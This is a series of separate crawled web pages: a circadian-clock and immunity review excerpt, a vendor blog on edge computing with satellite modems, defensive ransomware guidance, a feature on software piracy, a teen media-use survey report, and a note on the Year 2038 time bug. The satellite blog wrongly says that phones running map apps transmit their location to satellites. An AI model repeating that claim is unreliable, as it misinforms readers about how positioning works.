Pharmacy and Biomolecular Sciences and senior author on the paper, added: “This study also shows that anything which negatively impacts on our body clocks, such as insufficient sleep and not enough daylight, can impact on the ability of our immune system to work effectively.” The 2017 Nobel Prize for Physiology or Medicine has been awarded to three of the principal scientists who contributed to the discovery of the network of genes and proteins regulating the circadian rhythms based on the light/dark 24 h cycle (“The 2017 Nobel Prize in Physiology or Medicine—Press Release”) [1–3]. Circadian clocks are present in unicellular organisms, in plants, insects and vertebrates . The first gene encoding a critical component of a circadian clock (Period) was discovered in Drosophila by Konopka and Benzer in 1971 , showing that circadian clocks are genetically encoded. In mammals, circadian clocks are found in nearly all cells and tissues. They regulate and control physiological processes at the cellular, organ and organismal level, integrating signals received from outside and generated by the normal metabolism. The purpose of different levels of control is to adjust for possible local perturbations, while maintaining a circadian rhythm able to optimize energy allocation for the most likely scenario (which differs during activity and rest periods). For example, the liver clock should be synchronized to rhythms in food intake, but it should also respond to changes in energy demands or variations in oxygen supply. The organization of the mammalian multi-clock system allows for better adaptation to changing environments. This may represent a compromise between flexible adaptation to extremely unpredictable events and circadian stability, which can distinguish also the changes of light–dark hours (and temperature, humidity etc.) with the different seasons [4, 6]. Time keeping signals (“zeitgeber”) in natural conditions are tied to the day-night cycle imposed by the 24 h rotation cycle of the Earth. Light, this very potent zeitgeber, regulates the 24 h sleep–wake rhythm. Sleep precludes both food intake and locomotor activity. Thus, the sleep–wake rhythm governed by sunlight indirectly drives food intake and body temperature cycles. However light and food can be uncoupled (e.g. in the case of jetlag or when food intake is restricted to the natural sleeping phase as in shift work), causing misalignment of these clocks with the daily light–dark cycle of our environment [7, 8]. The field was stimulated by the finding of an intrinsically photosensitive small subgroup of retinal ganglion cells which regulate the circadian rhythms on the light–dark cycle [9, 10] and project to the suprachiasmatic nuclei (SCN) , the non-visual brain centers where the mammalian master biological clock is located; this has prompted the search for the molecular clock(s) driving this essential component of all living organisms. A handful of genes and proteins accounting for this complex regulatory central network has been identified. The mammalian core molecular clock consists of two feedback loops connected by a central pair of transcription factors which regulate reciprocally to induce the rhythm of gene expression. The mammalian circadian clock fundamentally depends on two master genes (CLOCK and BMAL1) to drive gene expression and regulate biological functions . CLOCK:BMAL1 heterodimers promote rhythmic chromatin opening and this mediates the binding of other transcription factors adjacent to CLOCK:BMAL1 . Among their targets there is a group of regulatory proteins [PERIOD (PER1, 2 and 3), CRYPTOCHROME (CRY1 and 2), REV-ERB (REV-ERBa and b) and RAR-Related Orphan Receptor (RORa, b and c)]; REV-ERBs and RORs regulate BMAL1 transcription, whereas PER and CRY dimerize to inhibit the BMAL1–CLOCK dimer. PER, the protein encoded by period [14, 15] accumulates during the night and is degraded during the day, while other components allow nuclear translocation of PER [16, 17]. Both sleep–wake cycles and many 24-h rhythms persist in the absence of environmental cues and are controlled by internal molecular clocks . Several loops dictate the production of these proteins, including steps of acetylation and phosphorylation, as well as secondary clock-regulated genes which can also feed back on central clock genes [6, 19]. In fact many different organs and tissues express functional molecular clock circuits . None of the mammalian clock components is directly photoreceptive; instead, light signals from the retina are transmitted neuronally to transcription factors that regulate period expression. Transcriptional feedback loops are central to the generation and maintenance of circadian rhythms [21, 22]. Clocks in peripheral tissues use essentially the same molecular components as in the SCN; clocks have been detected in different hematopoietic cell lineages, including macrophages and lymphocytes [22, 23]. The origin of circadian rhythms In humans, circadian rhythms of 24 h must be synchronized to coincide with the daily rotational cycle of the earth. The alignment of this autonomous circadian rhythm to an external rhythm is defined as entrainment. The light patterns represent the principal environmental stimulus for the rest/activity and sleep/wake cycles . It is also indirectly responsible for timing of food intake, another powerful entrainer of rhythm [24, 25]. Circadian photoentrainment is the process by which the internal clock in the deep brain becomes synchronized with the daily external cycle of solar light and dark [4, 9, 26]. The clocks in most mammalian cells are not directly photoreceptive, unlike those of most other organisms, but instead are entrained indirectly to the environmental light–dark cycle via photoreception in the retina, the retino-hypothalamic tract, and a central pacemaker tissue in the suprachiasmatic nucleus (SCN) of the hypothalamus . This process is initiated by a type of retinal ganglion cells that send axonal projections to the SCN, the region of the circadian pacemaker (Fig. 1). In contrast to retinal cells mediating vision, these cells are intrinsically sensitive to light, independent of synaptic input from rod and cone photoreceptors . Photoentrainment of the master pacemaker needs signaling from retinal ganglion cells containing the photopigment melanopsin and intrinsically photosensitive . The cryptochrome/photolyase family of photoreceptors mediates adaptive responses to ultraviolet and blue light exposure in all life forms . The SCN subsequently synchronizes peripheral clocks via mediators including hormones and neuronal signals, primarily using the hypothalamic–pituitary–adrenal (HPA) axis and the autonomic nervous system . The principal hormones i.e. glucocorticoids and catecholamines (epinephrine and norepinephrine), are released by the adrenal gland via the HPA axis , but norepinephrine is also derived from sympathetic nerve endings. The HPA is controlled by the SCN which projects to the paraventricular nucleus of the hypothalamus, and this in turn induces the release of adrenocorticotropic hormone by the pituitary, thus regulating the adrenal gland [20, 30]. Catecholamines act via adrenergic receptors, which have many effects on immune cells, as well as increasing the humoral immune responses . The integrated circadian system The central biological CLOCK system, influenced by light/dark changes, ‘creates’ the internal circadian rhythms, and the organism ‘feels’ these changes to put in frame physical activities, including energy metabolism, sleep, and immune function. A recent review listed the following pathological conditions showing diurnal or 24 h patterning, by the organ/tissue/system affected, skin: atopic dermatitis, urticaria, psoriasis, and palmar hyperhidrosis; gastrointestinal: esophageal reflux, peptic ulcer, biliary colic, hepatic variceal hemorrhage, and proctalgia; infection: susceptibility, fever, and mortality; neural: frontal, parietal, temporal, and occipital lobe seizures, Parkinson’s and Alzheimer’s disease, hereditary progressive dystonia, and pain (cancer, post-surgical, diabetic neuropathy, burning mouth and temporomandibular syndromes, fibromyalgia, sciatalgia, and migraine, headache); renal: colic and nocturnal enuresis and polyuria; ocular: conjunctival redness, keratoconjunctivitis sicca, intraocular pressure, anterior ischemic optic neuropathy, and recurrent corneal erosion syndrome; psychiatric/behavioral: major and seasonal affective depressive disorders, bipolar disorder, suicide, and addictive alcohol, tobacco, and heroin cravings and withdrawal phenomena; plus autoimmune and musculoskeletal: rheumatoid arthritis, osteoarthritis, axial spondylarthritides, gout, Sjogren’s syndrome, and systemic lupus erythematosus. Some are directly linked to disruption of circadian rhythms, others result in disturbed sleep with loss of rhythmicity; the peripheral clocks in different tissues become out of phase with the central regulator and other physiologic functions, and this in turn aggravates the symptoms and alters the clinical picture. Relevance to immunological functions A wide range of immune parameters, such as the number of peripheral blood mononuclear cells as well as the level of cytokines, undergo daily fluctuations . Total numbers of hematopoietic stem cells and most mature leukocytes peak in the circulation during the resting phase (during the night for humans) and decrease during the day . Most immune cells express circadian clock genes and present a wide array of genes expressed with a 24-h rhythm. In addition to their functions in the cellular clock, circadian oscillators also participate in the development and specification of immune cell lineages. This has profound impacts on cellular functions, including a daily rhythm in the synthesis and release of cytokines, chemokines and cytolytic factors, the daily gating of the response occurring through pattern recognition receptors, circadian rhythms of cellular functions such as phagocytosis, migration to inflamed or infected tissue, cytolytic activity, and proliferative response to antigens . A pioneering contribution to this area was made by Halberg who discovered a diurnal susceptibility pattern in mice challenged with bacterial endotoxin. The migration of hematopoietic cells to tissues preferentially occurs during the daytime, directed by the circadian expression of cell adhesion molecules and chemokines. During the active phase it is more likely to encounter and detect pathogens and leukocyte trafficking into tissues occurs at the beginning of this phase (early morning). The increased cytokine release at this time point therefore may exacerbate any ongoing local inflammation . One of the mechanisms through which the central clock entrains peripheral tissues is by the production of glucocorticoids in the adrenal gland. Many other circadian signal transduction mediators also regulate the immune response, as melatonin and the autonomic nervous system (Fig. 1). Perturbation of the redox rhythm (linked to the circadian clock) induced by pathogen challenge triggers immune defense genes without compromising the circadian clock . Activation of innate immunity via TLR4 induces systemic inflammation by eliciting neuroendocrine and leukocyte transcriptional responses, which are regulated by the circadian clock, imposing diurnal rhythm of the inflammatory response . The central clock is sensitive to immune challenge and the brain receives inflammatory signals from the periphery in response to injury/infection. This in turn is thought to exacerbate sickness, develop symptoms like depression, and impair diurnal rhythms of temperature and melatonin secretion . Melatonin, secreted by the pineal gland under SCN control, plays an important role in immune regulation; pinealectomy causes extensive immunosuppression, likely mediated by the decrease in lymphocytes and cytokines such as IL-2, IL-12, and TNF-α . Sleep and light influences The time and duration of sleep is tightly controlled by central mechanisms. These may be disrupted by disease processes, but also by other external conditions, such as night shifts, long range flight travels (jet-lag) and social nocturnal activity (social jet-lag). Pro-inflammatory cytokines are generally indicated as sleep-inducing, and basal plasma levels of these cytokines appear higher during the rest phase. Infection-associated sleepiness has been attributed to increased pro-inflammatory cytokine plasma levels . Long-term sleep restriction leads to a gradual increase of circulating leukocytes and subpopulations (neutrophils, monocytes and lymphocytes) with alterations of the number and rhythm of neutrophils persisting after 1 week recovery of sleep ; also absolute sleep deprivation alters the rhythmicity of granulocytes . Sleep disorders are one of the most common symptoms in patients with HIV/AIDS , but despite the circadian rhythm alteration induced by tat HIV-infected patients with higher HIV Tat protein concentrations had better sleep quality, probably because it increases melatonin production, thus counteracting poor sleep quality induced by HIV . On the opposite spectrum of sleep disorders, narcolepsy, which is generally considered an immune-mediated neurological disease characterized by excessive daytime sleepiness, has been recently characterized by increased inflammatory cytokine production and B and T cell activation markers at variance with other hypersomnia patients who were immunologically distinct and did not present increased plasma cytokines. Many immunological functions depend on the influence of sleep on circadian rhythms, and loss of sleep, in turn, alters the production of glucocorticoids during the night . The neuroendocrine immune response of the HPA axis and sympathetic nervous system, which is activated in response to an antigenic challenge, with a transient inflammatory activity, can lead to metabolic diseases when chronically activated , since in all inflammatory conditions high amounts of energy have to be provided for the activated immune system. Experimental animal models and epidemiological data indicate that chronic circadian rhythm disruption increases the risk of metabolic diseases . In patients with rheumatoid arthritis (RA), inflammation is an important covariate for the crosstalk of sleep and the HPA axis. Moreover the interrelation between sleep parameters, inflammation as objectified by C-reactive protein and serum cortisol and adrenocorticotropic hormone levels . Knowledge of circadian rhythms and the influence of glucocorticoids in rheumatology is important : beside optimizing treatment for the core symptoms (e.g. morning stiffness in RA), chronotherapy might also relieve important comorbid conditions such as depression and sleep disturbances . Sleep and circadian disturbances are a frequent complaint of Alzheimer’s disease patients, appearing early in the course of disease, and disruption of many circadian rhythms are present also in Parkinson’s disease . Physiological studies show that aging affects both sleep quality and quantity in humans, and sleep complaints increase with age . Moreover, also feeding/fasting rhythms are compromised. Circadian expression of secreted signaling molecules transmits timing information between cells and tissues. Such daily rhythms optimize energy use and temporally segregate incompatible processes. Patients suffering from neuropsychiatric disorders often exhibit a loss of regulation of their biological rhythms which leads to alterations of sleep/wake, feeding, body temperature and hormonal rhythms. Increasing evidence indicates that the circadian system may be directly involved in the etiology of these disorders . Light, especially short wavelength blue light, is the most potent environmental cue in circadian photoentrainment and lens aging is thought to influence this event by acting as a filter for shorter blue wavelengths ; light conditions during indoor activities as well as sunlight exposure are of paramount importance to preserve the circadian rhythmicity and avoid a risk factor for several chronic diseases. These considerations impact on the comorbidities of aged subjects, and the importance of the choice of the differential light-filtering properties of intraocular lenses after cataract removal . reference link :https://www.ncbi.nlm.nih.gov/pmc/articles/PMC5763605/ More information: George A. Timmons et al, The Circadian Clock Protein BMAL1 Acts as a Metabolic Sensor In Macrophages to Control the Production of Pro IL-1β, Frontiers in Immunology (2021). DOI: 10.3389/fimmu.2021.700431
<urn:uuid:436ab413-b022-4db0-bcd9-2971333a731f>
CC-MAIN-2022-40
https://debuglies.com/2021/11/24/the-significant-role-that-an-irregular-body-clock-plays-in-driving-inflammation-in-the-bodys-immune-cells/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335124.77/warc/CC-MAIN-20220928051515-20220928081515-00621.warc.gz
en
0.916245
3,917
3.703125
4
The Edge of Extraterrestrial Exploration October 4, 2018 How edge computing will enable more powerful satellite communications Strangely, satellite communications have always been extremely limited in potential. But that’s about to change – thanks to edge computing and the iot world. If you’re not exactly familiar with how satellite communications work, here’s a quick explanation: any entity that wants to leverage satellite networks will need to use a satellite modem to transmit data from a specific location or item to one of the hundreds of satellites orbiting the earth. That entity also has to pay a satellite communications company to use those satellite networks, in the same way consumers pay for cell phone service. From that perspective, it doesn’t sound that complex. However, there are a couple of complicating factors. First, it’s quite expensive to transmit data via satellites. Satellite operators take on enormous costs to install their communication protocols on each satellite, and the satellite modems themselves are not cheap either. When compared to cellular networks, which transmit signals from tower to tower, there’s a big difference in cost. Who would have thought operating gigantic space tech would be so expensive? Also, the devices used to communicate with satellites aren’t very smart. They are generally programmed with only a few low-bandwidth protocols and can collect and send very limited data inputs up to satellites for transmission. There’s no processing power to take in various inputs, decide which ones are really necessary, and then package them up for transmission. Advances in edge computing will enable cheaper, more actionable satellite communications, by giving new life to existing infrastructure. Here’s an example of how it will happen: Edge compute devices + satellite modems = better data insights via satellite. Consider how satellite communications work today to understand how they will improve in the future. Many of us who navigate road traffic each day use Google Maps or Waze to map driving routes, find out our estimated travel time, avoid wrecks and road closures, find the nearest Dairy Queen, etc. As we’re driving, there’s a constant signal on the screen of where we are located. This signal is sent from our devices to a satellite. Repeatedly it says, “here I am, here I am”. Until of course, you become fixated with texting George about lunch plans and “there your not”. It might seem like business communications through satellites would be more complex than our driving example, but they really aren’t. That same “here I am, here I am” signal is all they are getting as well, it’s just for a different entity. Maybe it’s a trucking company that has hundreds of trucks, or an airline tracking airplanes as they circle the globe. Today, the highest level of data complexity transmitted is still just location-based. Edge computing will enable more, higher-quality data inputs by supercharging the processing power of satellite modems in use today. Because of the way satellite modems are built, they simply can’t handle the level of bandwidth needed to provide more complex inputs. However, an edge computing device operating on an internet of things cloud platform paired with a satellite modem can provide much more sophisticated data insights. Let’s say a global shipping company wants to track what’s happening with their shipping containers at any point in time. In addition to where the container is located, they’ll want to know which specific items are in each container, what the temperature is in the container, what the humidity or moisture level is (in case anything has gotten wet), and if any of the items have changed position (maybe turned over) since they were placed in the container. Without an edge computing platform, all they know is where the container is at any point in time. They can’t find out the condition of the items until they have arrived, which could cause significant delays for customers if anything needs to be reshipped. Imagine a scenario where sensors are placed in specific places throughout the container – inside, outside, and even on items themselves. These sensors collect data on all the inputs we mentioned and send them back to an edge compute device. The edge compute device then reviews all the data and looks for exceptions. Has the temperature changed a great deal? Has one of the items rotated 180 degrees? Any flagged data will be packaged in the appropriate satellite protocol and sent to the satellite modem, for transmission to the satellite.
<urn:uuid:16d801cc-345b-487f-b143-2ecbb664d7eb>
CC-MAIN-2022-40
https://www.clearblade.com/blog/the-edge-of-extraterrestrial-exploration/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335124.77/warc/CC-MAIN-20220928051515-20220928081515-00621.warc.gz
en
0.928809
932
2.953125
3
Ransomware Attacks: How to Prepare, Prevent, and Respond Ransomware attacks are increasing in volume and complexity and are mutating in the scope of the attacks. Recently we have seen many highly publicized and disruptive attacks against corporations and government entities. In our work responding to these types of incidents, we have found a direct correlation between the time it takes to respond to a Ransomware attack and the cost associated with recovering from one. Are you prepared to respond quickly to one of these attacks? Ransomware is an immediate threat to the continued operation of an organizational entity through the actions of a bad actor to seize and encrypt a company’s data, rendering the data unusable by the company until a ransom has been paid or another action has been performed as demanded by the perpetrator. The Department of Homeland Security (DHS) has issued a warning about the increasing frequency of these attacks and a more diverse group of targets ranging from individuals to small businesses to large organizations and government entities. Ransomware Attacks typically occur in two forms: - The bad actor has demanded a ransom in return for decrypting or returning your data. - The bad actor has demanded a ransom in return for not releasing your confidential data to the public. Ransomware exploits the path of least resistance and relies on taking advantage of individuals within an organization to perform certain actions like clicking on a link, opening up an email attachment, or adding a rogue program. Or through an exposure resulting from maintenance actions like patching or upgrades not being performed. While some organizations have robust Incident Response programs that address Ransomware and are better prepared to recover and sustain business operations, many companies do not. A documented and thorough Incident Response program covering Ransomware helps organizations respond and rebound quickly from these events. In fact, many organizations we see are preparing specific plans which focus exclusively on ransomware response. A well-documented plan should cover how to prepare for, prevent, respond to and recover from these events. A comprehensive plan can also serve as the foundation for building Business Continuity and Disaster Recovery programs (BCDR). Organizations should focus on having a program in place and vendors selected with contracts in place before a ransomware event occurs. Some common defenses to prevent or mitigate Ransomware incidents include: - Mitigate social engineering. Develop social engineering awareness. - Patch software or operating systems frequently. - Harden system configurations and security settings. - Use Multi-Factor Authentication and strong passwords for any internet-facing authentication. - Recognize rogue URLs by naming structure or spelling errors. - Use least permissive permissions. Systems should be configured to “Deny ALL or Protect ALL”. - Implement Anti-Phishing Measures (e.g., spam filters). - Get Cyber Security Insurance (Note what is being covered) - Test backups and data restoration processes before you actually need them. - Implement good endpoint protection (AV Software). - Implement Data Loss Prevention Controls. - Implement Whitelisting of programs vs. Blacklisting. - Perform an annual risk assessment, or more frequently, depending on change in environment or actual incident occurrence. The best protection against Ransomware is preventing it from occurring in the first place by utilizing the incident prevention measures covered above. If you become the victim of a successful Ransomware attack, the options are more limited and require some difficult decisions but can succeed. CompliancePoint is frequently involved in helping our customers respond to Ransomware incidents, and we have staff standing by. If you have questions or need assistance, please email us at [email protected] Finding a credible expert with the appropriate background, expertise, and credentials can be difficult. CompliancePoint is here to help.
<urn:uuid:3c14f195-d2b3-45da-8a4f-e315573c0880>
CC-MAIN-2022-40
https://www.compliancepoint.com/cyber-security/ransomware-attacks-how-to-prepare-prevent-and-respond/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.37/warc/CC-MAIN-20220930212504-20221001002504-00621.warc.gz
en
0.932844
761
2.6875
3
The pandemic caused by COVID-19 has a destructive reach that goes beyond that of a highly contagious and deadly illness. It is also contributing to the rapid spread of piracy — as in spreading illegal copies of commercial software. Software piracy involves much more than businesses and consumers using illegal copies of computer programs. What lurks within the pirated copies is often rogue code — malware — that can be just as deadly to computers and users’ finances. Software companies are reporting that piracy has increased 20 to 30 percent due to COVID-19 and working from home, according to Ted Miracco, CEO of compliance and licensing management firm Cylynt. The Software Alliance (BSA), research shows nearly 40 percent of all software used worldwide is not properly licensed and software companies are losing nearly US$46 billion a year due to unlicensed use,” he told the E-Commerce Times. More specifically, pirated software has a five-pronged consequence that its victims discover only when caught or infected, noted Miracco: 1. Remote work environments are creating a situation where hackers can breach an online fortress to seize a company’s intellectual property. 2. Unemployed workers are buying pirated software over the Internet to generate income. 3. WFH employees are making illegal copies of the software they need for their jobs. 4. The ubiquity of the Internet and the wholesale move to cloud computing are not as secure as they could be. 5. Software pirates and hackers are resourceful at hiding their identities and evading anti-piracy technologies. The practice of pirating software — illegally using and distributing someone else’s software — has existed since the advent of commercial software. In most cases, pirating software involves the intentional bypass of software security controls, like licenses and entitlements, meant to prevent unauthorized use, according to Paul Dant, vice president for product management of security at Digital.ai. Dant is a reformed child hacker and former software pirate. Software piracy is so widespread that it exists in homes, schools, businesses, and government offices. Software piracy is practiced by individual PC users as well as computer professionals dealing wholesale in stolen applications, according to BSA. The Software Alliance, headquartered in Washington, D.C. with operations in more than 30 countries, is an international organization representing the leading software developers and a foremost advocate for the global software industry before governments and in the international marketplace. It generally issues a Global Software Report every two years. The last such report was published in 2018. That report found the use of unlicensed software, while down slightly over the previous two years, was still widespread. Unlicensed software is still used around the globe at alarming rates, accounting for 37 percent of software installed on personal computers — only a two percent drop from 2016. CIOs reported unlicensed software was increasingly risky and expensive. Malware from unlicensed software cost companies worldwide nearly $359 billion a year. CIOs disclosed that avoiding data hacks and other security threats from malware was the number one reason for ensuring their networks were fully licensed. “Software piracy and cyberattacks continue to escalate, and so far the government has done little to protect its own programs, let alone the private sector,” Miracco said. “Software companies need to take action and arm themselves with the best technological antipiracy solutions available to remain competitive and protect their assets.” Software Piracy Hotspots China, whose industrial output now exceeds that of the U.S., and whose policies encourage the theft of foreign technology and information, remains the world’s principal IP infringer. Other leading offenders include India and Russia, according to Miracco. A report published by Revenera (formerly Flexera Compliance) helps companies find and mitigate security and license compliance issues, according to its website. The graph below shows its ranking of the world’s top 20 license misuse and policy hot spots. Some compliance companies specialize in helping enterprise software users voluntarily comply with commercial software licensing requirements. Other firms seek out illegal software users. BSA and other organizations in recent years took uncooperative offenders to court to pay up. Globally, 37 percent of business users are not paying for software, making it a $46.3 billion problem. But eighty-three percent of these unlicensed users in mature markets are legally-inclined victims of software piracy who will pay for software, according to Revenera. The company also claims that the commercial value of unlicensed software in North America and Western Europe was $19 billion. The rest of the world totaled $27.3 billion last year. What Drives Piracy? The number one reason for software piracy is the cost of software licenses, according to Cylynt’s Miracco, followed by not seeing a reason to pay for something that is available free or at a cheaper price. “In developing countries such as China, where the time and cost of developing high technology software from scratch is a barrier to leapfrogging the technology gap, the government encourages the theft of software,” he said. “This is done to reach its goal of Made in China 2025 to make China the global leader in high-tech manufacturing by 2025.” In addition to deliberate software piracy, significant revenue is lost by software companies through unintentional misuse of licenses. Especially in today’s WFH environment, employees are sharing licenses and/or downloading cheaper, illegal software not provided by their employers on their home computers, Miracco noted. Consider this scenario as a check of your own potentially illegitimate software use, suggested a Cylynt representative. It helps understand the path software users follow — sometimes unknowingly — to piracy. You download software to help with a project. Did the software come from the company or a certified partner? Or, did it come from what seemed like a legitimate free download site? If this is the case, did the original software manufacture put its software on the site or give permission for it to be freely downloaded? If not, you could be in violation of the software owner’s copyright. Or worse. It could be an unlicensed, pirated copy of the software full of malware about to set off a chain reaction within your company’s IT network. Part of the Problem or Hapless Victim? Given the above example, are software “borrowers” complicit or innocent of piracy? Software users caught in the above situation become both, in Miracco’s view. Deliberate pirates, especially hackers from China, are encouraged by the government to steal software. In other cases, smaller companies that cannot afford to pay for expensive software buy illegal copies and provide them to their employees, who use whatever tools they are given in order to do their jobs, he reasoned. “Sometimes, the use could be inadvertent. A WFH employee desperately needs a vital software tool and pulls it off the web without realizing it is a hacked or illegal copy,” he said. The Piracy Scheme Software attackers reverse engineer the target software. They identify the areas of code that handle the security controls. Then they simply modify that code to bypass or disable them, according to Digital.ai’s Dant. “In other words, if I have your software, I can understand how it works and modify it to run completely under my control to include communication with your backend application servers. Without the appropriate protection in place, these attacks are trivial to carry out for an experienced software pirate,” he told the E-Commerce Times. Remember Dant’s background as a reformed child hacker and former software pirate. He says this with great authority. “We continue to struggle with software piracy today because the same inherent software exposures I utilized in the 80s and 90s still exist in plain sight,” he asserted. “Particularly in the age of mobile apps and IoT devices, the stakes go well beyond financial loss due to software piracy. If an application is compromised, we are now contending with everything from massive data exfiltration to degraded operations in healthcare facilities to threats against our privacy, safety, and health,” he said. Is Piracy a Problem Without a Workable Solution? Absolutely not, retorts Miracco. Software developers who have adopted antipiracy and license compliance software and have built robust programs are satisfied with the results. Some companies have opted to develop their own in-house programs. However, most have found that partnering with a company that specializes in antipiracy technology is less resource intensive and yields more, and higher quality, results. “Some piracy will always exist, of course. For companies using antipiracy technology, the losses have declined sharply,” he said. Dant has a different approach to solving the problem. Software makers must make their software more difficult to reverse engineer. They need to enable their software to detect tampering and prevent further execution in a tampered state. “While rarely mentioned in media coverage, it is those distinct exposures that provide an attacker with an initial advantage for researching and formulating attacks surreptitiously and anonymously. But, keep in mind that developers are not meant to address these concerns,” he added. There’s no coding trickery to fix this, Dant cautions. Protection against this type of attack relies upon establishing continuous integration and delivery pipelines that instrument protection before release, transparent to developers, and without any disruption to release flows. An Apt Solution Nothing is ever completely secured, especially software, Dant offered. But if software companies focus on software protection that frustrates and deters the types of attacks that enable piracy (and beyond), that effort can effectively eliminate a substantial subset of potential attackers due to their lack of necessary technical skills and motivation. Hackers’ and pirates’ motivations vary wildly. But they are often financial in nature. The better protected your software, the more likely an attacker will choose to move on and find a less protected application that requires fewer resources to attack, Dant suggested. “Severely diminishing the attacker’s return on investment is an effective risk mitigation strategy that can reduce the occurrence of piracy and other attacks against your software,” he concluded.
<urn:uuid:971a6e2a-6de0-4578-895a-4a87f679406f>
CC-MAIN-2022-40
https://www.crmbuyer.com/story/software-piracy-spreading-with-the-virus-86826.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337287.87/warc/CC-MAIN-20221002052710-20221002082710-00621.warc.gz
en
0.944974
2,129
2.90625
3
Although teens and tweens have more choices than ever when it comes to media activities, watching television and listening to music are their top preferences, according to a report Common Sense Media released this week. Among tweens, ages 8 to 12, watching TV was the top media activity, with nearly 62 percent saying they did it every day. For teens, ages 13 to 18, listening to music was the top media activity, with 66 percent of them saying they listend to music every day. The teenagers surveyed spent an average of nearly nine hours a day with entertainment media. Tweens averaged a little more than half that (5:55) on a daily basis. That included watching TV, movies and online videos; playing video, computer and mobile games; using social media; reading; and listening to music. Less Time With Social Screen time also varied between the teens and tweens. About a third of the study’s teen participants (31 percent) spent four to eight hours with screen media. Another 26 percent spent more than eight hours glued to a screen. By contrast, 27 percent of tweens spent four to eight hours before a screen, and 11 percent reported spending more than eight hours. While social media has become ingrained in the life of teens — the survey participants spent an average of one hour and 11 minutes on it — it seems they spend less time with it than they do with other activities. Forty-five percent of teens used social media every day, which is less than those listening to music (66 percent) or watching TV (58 percent) every day, according to the report. Moreover, only 36 percent of teens said they liked social media a lot, compared with 73 percent who felt that way about music, and 45 percent who liked TV a lot. No Social Reprise By its nature, social media doesn’t consume time like other media forms, noted Jan Dawson, chief analyst withJackdaw Research. “Once you’ve consumed social media for the day, you don’t keep going back, because there’s not that much that’s new. With TV and music, you can always find something new to watch on Netflix or television, and you can listen to new music every minute for the rest of your life,” he told TechNewsWorld. “Social networking can provide a certain amount of content and connection with friends, but it’s not the kind of thing you can spend hours consuming the way you can TV or music,” Dawson continued. “That’s why Facebook is developing avideos tab and doing more with instant articles,” he explained. “They want to recommend stuff to you that your friends haven’t shared because that’s the only way to increase time spent on the service.” There’s a growing equality gap in the ownership of computers, tablets and smartphones, the researchers found. Only 54 percent of households with incomes of less than US$35,000 a year had a laptop, for example, compared with 92 percent in households with incomes of $100,000 or more. The same is true for smartphone ownership. Only 51 percent of teens in low-income households owned a smartphone, compared with 78 percent in higher-income households. The divide between kids who can afford smartphones and those who can’t is a growing concern among educators. “I’ve heard educators in low-income communities talking about it,” said Alan Simpson, director of policy and communications at theInternet Keep Safe Coalition. “Most of their students have phones, but a lot of their students don’t have smartphones,” he told TechNewsWorld. “That matters if they want to introduce one-to-one blended learning and bring-your-own-device approaches, which are a great way to make sure every student in the classroom can access the online learning tools you want to use,” Simpson continued. “If half the students have phones that don’t go online, then they’re not getting the access that the other kids are getting.” Teens also have a benign view of how multitasking affects their homework. Half or more of the teen survey participants often or sometimes watched TV (51 percent), used social media (50 percent), engaged in texting (60 percent) or listened to music (76 percent) while doing their homework, they told researchers. Many teens didn’t feel those activities affected their homework for better or worse. Nearly two-thirds said watching TV (63 percent) or texting (64 percent) had no impact on their homework. They expressed similar feelings about social media (55 percent) and listening to music (44 percent). In fact, half of teens polled thought listening to music helped more than hurt their homework. Students may be deluding themselves, though, if they think media activity doesn’t affect their homework. “Multitasking” inaccurately describes what humans do when they juggle tasks, according to Timothy A. Pychyl, director of theProcrastination Research Group at Carleton University. “We don’t multitask; we task switch, and it interrupts our learning process,” he told TechNewsWorld. “Homework that was very simple probably wouldn’t be affected, but anything that requires higher-order thinking skills, like synthesis or analysis, will suffer,” Pychyl said. “You can multitask when tasks are very simple or at least partly automatic for you,” he added. “As soon as your brain has to do novel things that involve much more processing and sustained attention, multitasking will undermine performance.” There are stark differences in media preferences between the sexes, according to Common Sense. Teen girls liked listening to music (37 percent) more than boys (22 percent), as well as reading (14 to 5 percent) and participating in social media (14 to 5 percent). For video games, though, boys overwhelmingly cited them as a favorite media pastime (27 percent) more often than girls (2 percent). Teen boys spent an average of 56 minutes a day playing video games compared with seven minutes for girls, the researchers found. As many media providers are acutely aware, today’s youth are getting a daily dose of content through mobile screens, which is borne out by the Common Sense report. Forty-one percent of all screen time for tweens took place on a mobile device. For teens, it was 46 percent. Parents appeared to be more concerned with the content their kids were interacting with than the amount of time they spent before screens, the researchers found. More than half of teens (53 percent) and 72 percent of tweens said their parents had talked to them about how much time they spent in front of a screen. However, 66 percent of teens and 84 percent of tweens said their parents had spoken to them about the content of the media that they used.
<urn:uuid:7395e3fe-8ebf-443a-9e8b-414dc84210a6>
CC-MAIN-2022-40
https://www.ecommercetimes.com/story/for-tech-savvy-teens-and-tweens-tv-and-music-still-rule-82712.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337731.82/warc/CC-MAIN-20221006061224-20221006091224-00621.warc.gz
en
0.960855
1,479
2.625
3
Today is the 19th of January, 2013. Which means 19th of January, 2038 is now exactly 25 years away from us. Why does it matter? Because at 03:14:07 UTC on 19th of January 2038 we will run into the Year 2038 Problem. Many Unix-based system can't handle dates beyond that moment. For example, common Unix-based phones today won't let you set the date beyond 2038. This applied to all iPhones and Androids we tried it on (iOS is based on BSD and Android is Linux). Obviously this does not apply to Windows Phones, which let you set the date all the way to year 3000. Yes, 25 years is a long time. But Unix-based systems will definitely still be in use at that time. And some things can start failing way before 2038. For example, if your Unix-based system calculates 25-year interests today, it better not be using time_t for the calculations.
<urn:uuid:9b3a9bb9-d473-452e-9177-0062a2b59c8b>
CC-MAIN-2022-40
https://archive.f-secure.com/weblog/archives/00002489.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334987.39/warc/CC-MAIN-20220927033539-20220927063539-00021.warc.gz
en
0.948031
205
3.4375
3
